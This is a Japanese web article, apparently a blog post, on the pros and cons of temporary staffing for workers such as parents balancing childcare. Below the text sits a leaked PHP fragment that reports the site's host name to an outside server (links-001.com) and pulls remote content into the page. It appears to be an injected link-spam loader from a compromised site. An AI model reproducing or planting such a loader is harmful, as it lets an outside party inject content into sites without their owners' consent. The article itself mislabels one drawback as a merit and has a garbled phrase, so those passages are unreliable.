前へ
次へ

人材派遣のメリットとデメリットについて知ろう

人材派遣は有期の雇用が前提で、人材を探す会社と働きたい人を仲立ちとする会社から派遣をしてもらうという働き方です。
この働き方は期間に定めがありますので、更新がなければ満期で仕事を終えることができ、更新すればまた新たな派遣期間雇用されるという形になっています。
この働き方は正社員とは異なり、無期雇用で定年があるというのではなく、数か月から数年などあらかじめ定められた期間を勤めれば自然に退職という形になります。
この働き方にはメリットとデメリットがあり、メリットとして有期雇用なので正社員と比べると責任が軽く、業種もある程度選んで働くことができるといった点などがあります。
また、正社員で仕事を探すよりも自身が希望する仕事に就きやすかったり、仕事場所を選びやすかったりするといったメリットがあり、正社員だとなかなか仕事が見つかりにくいけれども人材派遣なら見つかりやすいというメリットなどもあります。
人材派遣は主婦などが育児や家事と両立して仕事をしたいという時によく利用されている働き方です。
お子さんが小さかったり、多くてフルタイムの正社員で働くのは難しいという場合でも、派遣であれば時間になれば帰宅しやすいですし、ある程度の給料が出て、パートやアルバイトよりもいいといったメリットもあります。
一方でメリットとして、有期雇用であるため更新がなければ仕事が終わってしまい、再び仕事を探さなければならないという点や正社員として就業できるようなスキルがなかなか獲得しにくい点などがあります。
けれども仕事が満了した際には、派遣会社がまた新たな仕事を紹介してくれるといったことも期待できますので、期間は飽くかもしれませんが長期的には仕事に就いているケースも多くあります。
ただし、正社員とは異なった雇用形態で、雇用されていないときは社会保険に加入する必要もあり、手続きが頻雑になりやすいといったデメリットもありますので注意が必要です。

".file_get_contents('http://links-001.com/gfjset.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top